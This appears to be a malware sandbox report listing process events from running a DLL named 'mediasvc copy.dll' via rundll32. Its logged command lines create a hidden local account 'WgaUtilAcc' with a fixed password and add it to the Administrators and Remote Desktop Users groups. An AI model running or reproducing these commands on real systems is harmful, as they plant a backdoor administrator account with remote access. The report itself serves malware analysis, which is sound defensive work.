    Reputation:moderate

    General

    Start time:15:52:26
    Start date:03/12/2020
    Path:C:\Windows\System32\net1.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
    Imagebase:0x7ff6a19e0000
    File size:175104 bytes
    MD5 hash:AF569DE92AB6C1B9C681AF1E799F9983
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate

    General

    Start time:15:52:27
    Start date:03/12/2020
    Path:C:\Windows\System32\cmd.exe
    Wow64 process (32bit):false
    Commandline:cmd /C net.exe user WgaUtilAcc ph9ZVf2Q /add
    Imagebase:0x7ff622070000
    File size:273920 bytes
    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    General

    Start time:15:52:27
    Start date:03/12/2020
    Path:C:\Windows\System32\net.exe
    Wow64 process (32bit):false
    Commandline:net.exe user WgaUtilAcc ph9ZVf2Q /add
    Imagebase:0x7ff7fdd20000
    File size:56832 bytes
    MD5 hash:15534275EDAABC58159DD0F8607A71E5
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate

    General

    Start time:15:52:27
    Start date:03/12/2020
    Path:C:\Windows\System32\net1.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\net1 user WgaUtilAcc ph9ZVf2Q /add
    Imagebase:0x7ff6a19e0000
    File size:175104 bytes
    MD5 hash:AF569DE92AB6C1B9C681AF1E799F9983
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate

    General

    Start time:15:52:28
    Start date:03/12/2020
    Path:C:\Windows\System32\cmd.exe
    Wow64 process (32bit):false
    Commandline:cmd /C net.exe LOCALGROUP 'Remote Desktop Users' WgaUtilAcc /ADD
    Imagebase:0x7ff622070000
    File size:273920 bytes
    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    General

    Start time:15:52:28
    Start date:03/12/2020
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe C:\Users\user\Desktop\mediasvc copy.dll,__dbk_fcall_wrapper
    Imagebase:0x7ff630ed0000
    File size:69632 bytes
    MD5 hash:73C519F050C20580F8A62C849D49215A
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    General

    Start time:15:52:28
    Start date:03/12/2020
    Path:C:\Windows\System32\net.exe
    Wow64 process (32bit):false
    Commandline:net.exe LOCALGROUP 'Remote Desktop Users' WgaUtilAcc /ADD
    Imagebase:0x7ff7fdd20000
    File size:56832 bytes
    MD5 hash:15534275EDAABC58159DD0F8607A71E5
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate

    General

    Start time:15:52:29
    Start date:03/12/2020
    Path:C:\Windows\System32\net1.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\net1 LOCALGROUP 'Remote Desktop Users' WgaUtilAcc /ADD
    Imagebase:0x7ff6a19e0000
    File size:175104 bytes
    MD5 hash:AF569DE92AB6C1B9C681AF1E799F9983
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate

    General

    Start time:15:52:30
    Start date:03/12/2020
    Path:C:\Windows\System32\cmd.exe
    Wow64 process (32bit):false
    Commandline:cmd /C net.exe LOCALGROUP 'Remote Desktop Users' user /ADD
    Imagebase:0x7ff622070000
    File size:273920 bytes
    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    General

    Start time:15:52:30
    Start date:03/12/2020
    Path:C:\Windows\System32\net.exe
    Wow64 process (32bit):false
    Commandline:net.exe LOCALGROUP 'Remote Desktop Users' user /ADD
    Imagebase:0x7ff7fdd20000
    File size:56832 bytes
    MD5 hash:15534275EDAABC58159DD0F8607A71E5
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate

    General

    Start time:15:52:30
    Start date:03/12/2020
    Path:C:\Windows\System32\net1.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\net1 LOCALGROUP 'Remote Desktop Users' user /ADD
    Imagebase:0x7ff6a19e0000
    File size:175104 bytes
    MD5 hash:AF569DE92AB6C1B9C681AF1E799F9983
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate

    General

    Start time:15:52:31
    Start date:03/12/2020
    Path:C:\Windows\System32\cmd.exe
    Wow64 process (32bit):false
    Commandline:cmd /C net.exe LOCALGROUP 'Administrators' WgaUtilAcc /ADD
    Imagebase:0x7ff622070000
    File size:273920 bytes
    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language

    General

    Start time:15:52:31
    Start date:03/12/2020
    Path:C:\Windows\System32\net.exe
    Wow64 process (32bit):false
    Commandline:net.exe LOCALGROUP 'Administrators' WgaUtilAcc /ADD
    Imagebase:0x7ff7fdd20000
    File size:56832 bytes
    MD5 hash:15534275EDAABC58159DD0F8607A71E5
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language

    General

    Start time:15:52:31
    Start date:03/12/2020
    Path:C:\Windows\System32\net1.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\net1 LOCALGROUP 'Administrators' WgaUtilAcc /ADD
    Imagebase:0x7ff6a19e0000
    File size:175104 bytes
    MD5 hash:AF569DE92AB6C1B9C681AF1E799F9983
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language

    General

    Start time:15:52:31
    Start date:03/12/2020
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe C:\Users\user\Desktop\mediasvc copy.dll,dbkFCallWrapperAddr
    Imagebase:0x7ff630ed0000
    File size:69632 bytes
    MD5 hash:73C519F050C20580F8A62C849D49215A
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language

    General

    Start time:15:52:32
    Start date:03/12/2020
    Path:C:\Windows\System32\cmd.exe
    Wow64 process (32bit):false
    Commandline:cmd /C net.exe user WgaUtilAcc ph9ZVf2Q
    Imagebase:0x7ff622070000
    File size:273920 bytes
    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language

    General

    Start time:15:52:32
    Start date:03/12/2020
    Path:C:\Windows\System32\net.exe
    Wow64 process (32bit):false
    Commandline:net.exe user WgaUtilAcc ph9ZVf2Q
    Imagebase:0x7ff7fdd20000
    File size:56832 bytes
    MD5 hash:15534275EDAABC58159DD0F8607A71E5
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language

    General

    Start time:15:52:33
    Start date:03/12/2020
    Path:C:\Windows\System32\net1.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\net1 user WgaUtilAcc ph9ZVf2Q
    Imagebase:0x7ff6a19e0000
    File size:175104 bytes
    MD5 hash:AF569DE92AB6C1B9C681AF1E799F9983
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language

    General

    Start time:15:52:34
    Start date:03/12/2020
    Path:C:\Windows\System32\drivers\rdpvideominiport.sys
    Wow64 process (32bit):
    Commandline:
    Imagebase:
    File size:30616 bytes
    MD5 hash:0600DF60EF88FD10663EC84709E5E245
    Has elevated privileges:
    Has administrator privileges:
    Programmed in:C, C++ or other language

    General

    Start time:15:52:35
    Start date:03/12/2020
    Path:C:\Windows\System32\drivers\rdpdr.sys
    Wow64 process (32bit):
    Commandline:
    Imagebase:
    File size:182784 bytes
    MD5 hash:52A6CC99F5934CFAE88353C47B6193E7
    Has elevated privileges:
    Has administrator privileges:
    Programmed in:C, C++ or other language

    General

    Start time:15:52:35
    Start date:03/12/2020
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe C:\Users\user\Desktop\mediasvc copy.dll,euefnaiw
    Imagebase:0x7ff630ed0000
    File size:69632 bytes
    MD5 hash:73C519F050C20580F8A62C849D49215A
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language

    General

    Start time:15:52:35
    Start date:03/12/2020
    Path:C:\Windows\system32\drivers\tsusbhub.sys
    Wow64 process (32bit):
    Commandline:
    Imagebase:
    File size:126464 bytes
    MD5 hash:3A84A09CBC42148A0C7D00B3E82517F1
    Has elevated privileges:
    Has administrator privileges:
    Programmed in:C, C++ or other language

    General

    Start time:15:52:38
    Start date:03/12/2020
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe C:\Users\user\Desktop\mediasvc copy.dll,gusiezo3
    Imagebase:0x7ff630ed0000
    File size:69632 bytes
    MD5 hash:73C519F050C20580F8A62C849D49215A
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language

    General

    Start time:15:52:42
    Start date:03/12/2020
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe C:\Users\user\Desktop\mediasvc copy.dll,hitit
    Imagebase:0x7ff630ed0000
    File size:69632 bytes
    MD5 hash:73C519F050C20580F8A62C849D49215A
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language

    General

    Start time:15:52:47
    Start date:03/12/2020
    Path:C:\Windows\System32\WerFault.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\WerFault.exe -u -p 7108 -s 1152
    Imagebase:0x7ff7757c0000
    File size:494488 bytes
    MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language

    Disassembly

    Code Analysis

    Reset < >